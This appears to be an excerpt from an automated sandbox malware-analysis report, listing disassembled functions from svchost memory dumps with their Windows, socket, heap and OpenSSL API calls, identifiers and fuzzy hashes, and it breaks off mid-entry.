                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleepgetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 3033474312-0
                                                                                            • Opcode ID: cbea957c7a8fdcc0c36749ae218925b5f3caa1a0fc7cb6f7d3f347c8bc36a720
                                                                                            • Instruction ID: a2bfa54ee94346c4bed367a70b40ff7f5ab527d45fabeb008bee819690a1b18c
                                                                                            • Opcode Fuzzy Hash: cbea957c7a8fdcc0c36749ae218925b5f3caa1a0fc7cb6f7d3f347c8bc36a720
                                                                                            • Instruction Fuzzy Hash: 3901D436B1968297E7548F11E46427AB3A2EF48780F384134DA8C43B95CF3ED048DB04
                                                                                            Function 00007FFDA3746560 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA373A4D4), ref: 00007FFDA374656B
                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA373A4D4), ref: 00007FFDA3746591
                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FFDA373A4D4), ref: 00007FFDA37465A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExclusiveLock$Release$Acquire
                                                                                            • String ID:
                                                                                            • API String ID: 1021914862-0
                                                                                            • Opcode ID: 487b4586fa51d13810dd78a9784ac8cd9bbedfc040dbe52416832f73b9c144de
                                                                                            • Instruction ID: 5894016ae6a9be5fb2b3b46539020f09a9133c0d22fe0e00ccbe4497c3c4aba6
                                                                                            • Opcode Fuzzy Hash: 487b4586fa51d13810dd78a9784ac8cd9bbedfc040dbe52416832f73b9c144de
                                                                                            • Instruction Fuzzy Hash: A2F0D610F5A443C2EA449F11DC7527572A3BF94705F800031D54F523A6DE2EF9498748
                                                                                            Function 00007FFDA36D67A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDA36D6861
                                                                                              • Part of subcall function 00007FFDA36DA920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36DA942
                                                                                              • Part of subcall function 00007FFDA36DA920: strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDA36DA956
                                                                                              • Part of subcall function 00007FFDA36DA920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36DA965
                                                                                              • Part of subcall function 00007FFDA36DA920: isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA983
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$_time64isspacestrtol
                                                                                            • String ID: connect_timeout
                                                                                            • API String ID: 1465606051-1301815820
                                                                                            • Opcode ID: f9e2b2dd4110b161da813af918f7151e10ea1b4db753d8a941a0c659d0753ac6
                                                                                            • Instruction ID: 0b354272caea5353533e933a5349d1da31917d50dd0887d8b3db30150e560392
                                                                                            • Opcode Fuzzy Hash: f9e2b2dd4110b161da813af918f7151e10ea1b4db753d8a941a0c659d0753ac6
                                                                                            • Instruction Fuzzy Hash: 7B31E833F0A9418AFFA08E2594201B96292AF45BE4F9D1235DE5D273C6CE3EE8458754
                                                                                            Function 00007FFD94735660 Relevance: 3.1, APIs: 2, Instructions: 76COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFD9472944E,?,?,?,00007FFD9472970A), ref: 00007FFD94735686
                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FFD947356E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FeaturePresentProcessor_invalid_parameter_noinfo
                                                                                            • String ID:
                                                                                            • API String ID: 1808705829-0
                                                                                            • Opcode ID: 1b2f749e313dfc5569fe0a61edaeb746f72f4ec4fd78a807df2ebfd42354c913
                                                                                            • Instruction ID: c4b7382a9d6cae43b54c37f6313c9643543a2988fd0af54ab5e087ae6145f988
                                                                                            • Opcode Fuzzy Hash: 1b2f749e313dfc5569fe0a61edaeb746f72f4ec4fd78a807df2ebfd42354c913
                                                                                            • Instruction Fuzzy Hash: 4B318621B1864AC2FA786F91A4B12BD7254AF87B84F648434DA4D076D7DF3DE801C791
                                                                                            Function 00007FFD9473EB54 Relevance: 3.0, APIs: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
                                                                                            • Opcode ID: c170c5a0fb32560508b9c18f16d7facb2d7ad41fdb307ab6ee759ac187c5f4d6
                                                                                            • Instruction ID: e954db05b43db8a0bb19b790385154669749875f5896c5f989ea6c928fa66a63
                                                                                            • Opcode Fuzzy Hash: c170c5a0fb32560508b9c18f16d7facb2d7ad41fdb307ab6ee759ac187c5f4d6
                                                                                            • Instruction Fuzzy Hash: EB11D361718B8581DA208B65B4A4269B361BB46BF4F648335EABD4B7E6CF7CD050C780
                                                                                            Function 00007FFDA3751460 Relevance: 3.0, APIs: 2, Instructions: 41networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: closesocketsocket
                                                                                            • String ID:
                                                                                            • API String ID: 2760038618-0
                                                                                            • Opcode ID: 1bb5e56c693462f46d2aa040be695f2e65611b92022052426d77c3839de081a9
                                                                                            • Instruction ID: 48ac835655b2797bb9bd7a6dcff65c7bafd5d63c91ba06c2358fddf17097b680
                                                                                            • Opcode Fuzzy Hash: 1bb5e56c693462f46d2aa040be695f2e65611b92022052426d77c3839de081a9
                                                                                            • Instruction Fuzzy Hash: 3001D152B067C587FFC887A590D17B82641AB14B76F0C5274CE2E163C2CE5E88D5C310
                                                                                            Function 00007FFD9471A538 Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                            • String ID:
                                                                                            • API String ID: 118556049-0
                                                                                            • Opcode ID: 739a9774b4a865556e64bdd6c4dac42dbca6b25d989a43e6407820ad6072e605
                                                                                            • Instruction ID: a64b99ce710f114b1012c82136832f3b0bed84b0a3334619a1a7b634354de88d
                                                                                            • Opcode Fuzzy Hash: 739a9774b4a865556e64bdd6c4dac42dbca6b25d989a43e6407820ad6072e605
                                                                                            • Instruction Fuzzy Hash: 17F0B650F1E10BC5FD7866E254F12B922A01F5E7A4F188B30D92F952D3EE1CE451D690
                                                                                            Function 00007FFDA3746C50 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExclusiveLock$AcquireRelease
                                                                                            • String ID:
                                                                                            • API String ID: 17069307-0
                                                                                            • Opcode ID: 4e63b957b1adf01b2c6230385774097f2dfe615c326b4d59037c5b0e72cf460b
                                                                                            • Instruction ID: 83146bfcc1e15a96356f73e06562c9077182f8ef1ffa34857fbc01f31fc78fee
                                                                                            • Opcode Fuzzy Hash: 4e63b957b1adf01b2c6230385774097f2dfe615c326b4d59037c5b0e72cf460b
                                                                                            • Instruction Fuzzy Hash: B3D09E24F5665283EB445F60A8E50B432A3AF9C315F401035C95F563A3DE2EED9D8758
                                                                                            Function 00007FFD9473D4EC Relevance: 2.6, APIs: 2, Instructions: 59COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast
                                                                                            • String ID:
                                                                                            • API String ID: 918212764-0
                                                                                            • Opcode ID: 5415232223c49cab955febe67e80327f788ad51cb6d2aa244ca356c60ab58e46
                                                                                            • Instruction ID: eb6dc1e3bbe805eb6a492bb8a93836fa895a1a646974affeaa3c67bd75e6135e
                                                                                            • Opcode Fuzzy Hash: 5415232223c49cab955febe67e80327f788ad51cb6d2aa244ca356c60ab58e46
                                                                                            • Instruction Fuzzy Hash: 5621A451B1864A81FE74A7E5A5F027D32825F867A4F24C235EA2E577D3DF6CE441C340
                                                                                            Function 00007FFD94746BD4 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                            • String ID:
                                                                                            • API String ID: 3215553584-0
                                                                                            • Opcode ID: 61ca4c0e3dcf3931f2aa7cc05ab79ab60357bdaf2b011f2860fe107a81363c0e
                                                                                            • Instruction ID: d18793a26732304a746fd4da8d9def83a37620268d2b7f412a78ca52754df88d
                                                                                            • Opcode Fuzzy Hash: 61ca4c0e3dcf3931f2aa7cc05ab79ab60357bdaf2b011f2860fe107a81363c0e
                                                                                            • Instruction Fuzzy Hash: 59219532708646C6DB718F58D4D037976A1EB85B94F248234DB5D476DADF3DD404CB40
                                                                                            Function 00007FFDA3738740 Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: socket
                                                                                            • String ID:
                                                                                            • API String ID: 98920635-0
                                                                                            • Opcode ID: 8aa9375f29b0daf2dca865736c81f69470b190bb2beb94a81ff9f0b00aa6f106
                                                                                            • Instruction ID: 381bd5833047d7b3bb59e757b0e462d32c70e32bd7959b4d3ae684a90b870bfc
                                                                                            • Opcode Fuzzy Hash: 8aa9375f29b0daf2dca865736c81f69470b190bb2beb94a81ff9f0b00aa6f106
                                                                                            • Instruction Fuzzy Hash: FA11EB36B09B9192D758CF22E09022D73A2FB88BA4F188234DBAD13785CF3DD491C704
                                                                                            Function 00007FFD94745E2C Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFD94736CC0: HeapAlloc.KERNEL32(?,?,00000000,00007FFD94737157), ref: 00007FFD94736D15
                                                                                            • InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FFD9474612D,?,?,?,?,?,00007FFD94747280), ref: 00007FFD94745E73
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocCriticalHeapInitializeSection
                                                                                            • String ID:
                                                                                            • API String ID: 2538999594-0
                                                                                            • Opcode ID: 6cd5710082f98f1af29d588ed0d0b39595080e41d2b5434fa37d833c2199aad1
                                                                                            • Instruction ID: 6f18f9fe98d3a53addecedcf3487f2f446d1242a5ccafa2d6a4868e1669c9b64
                                                                                            • Opcode Fuzzy Hash: 6cd5710082f98f1af29d588ed0d0b39595080e41d2b5434fa37d833c2199aad1
                                                                                            • Instruction Fuzzy Hash: DF11E33272879582E724CB65E59016D7760FB42B90FA8C635E36D07BC6DF38E462C740
                                                                                            Function 00007FFD94734E58 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                            • String ID:
                                                                                            • API String ID: 3215553584-0
                                                                                            • Opcode ID: 7b989286f25b60d0532184197740d0a63fa6c9eda64eaec38e8ba5dc223351be
                                                                                            • Instruction ID: a1c6d85178fd6ec9240b5ab9d57ebb3609817e9563c6fd7c3c9b1a3b65010052
                                                                                            • Opcode Fuzzy Hash: 7b989286f25b60d0532184197740d0a63fa6c9eda64eaec38e8ba5dc223351be
                                                                                            • Instruction Fuzzy Hash: 5AE0ED71B5910AC6FE396BF099B13BD32505F92305FA4C030D108462C3DF2D2802C7A1
                                                                                            Function 00007FFD94736CC0 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap
                                                                                            • String ID:
                                                                                            • API String ID: 4292702814-0
                                                                                            • Opcode ID: f801d3189da3d6c7343ef57b350583fa08c8a99c5efbcbdc2bc46658c8b3b4fc
                                                                                            • Instruction ID: 9ade36581fd7b2f9d26080d00903fa506db418a3fe192c146ab4509bad950338
                                                                                            • Opcode Fuzzy Hash: f801d3189da3d6c7343ef57b350583fa08c8a99c5efbcbdc2bc46658c8b3b4fc
                                                                                            • Instruction Fuzzy Hash: 61F01254B1960EC1FEB857E179B13B526856F87B80F6CD430D90D8A2D3ED1CF545C294
                                                                                            Function 00007FFD94736DA0 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FFD9473ED8D,?,?,00000000,00007FFD947419AF,?,?,?,00007FFD9473673F,?,?,?,00007FFD94736635), ref: 00007FFD94736DDE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap
                                                                                            • String ID:
                                                                                            • API String ID: 4292702814-0
                                                                                            • Opcode ID: 34529e8176ea61590ae8271852d7f7c8205af2c373919aa331187e0951f3297b
                                                                                            • Instruction ID: 78b60e2a03d1071c5326401daa2082fe525cbbb2e6b0a76f3a993fa8c2bbc86e
                                                                                            • Opcode Fuzzy Hash: 34529e8176ea61590ae8271852d7f7c8205af2c373919aa331187e0951f3297b
                                                                                            • Instruction Fuzzy Hash: 80F05E10B2960AC1FE7C26E169F027531945F877A0F18C230DD2E8A2C7EE1CF441C290

                                                                                            Non-executed Functions

                                                                                            Function 00007FFDA3688414 Relevance: 82.7, APIs: 45, Strings: 2, Instructions: 462COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debugX509_free$L_sk_new_nullR_vset_error
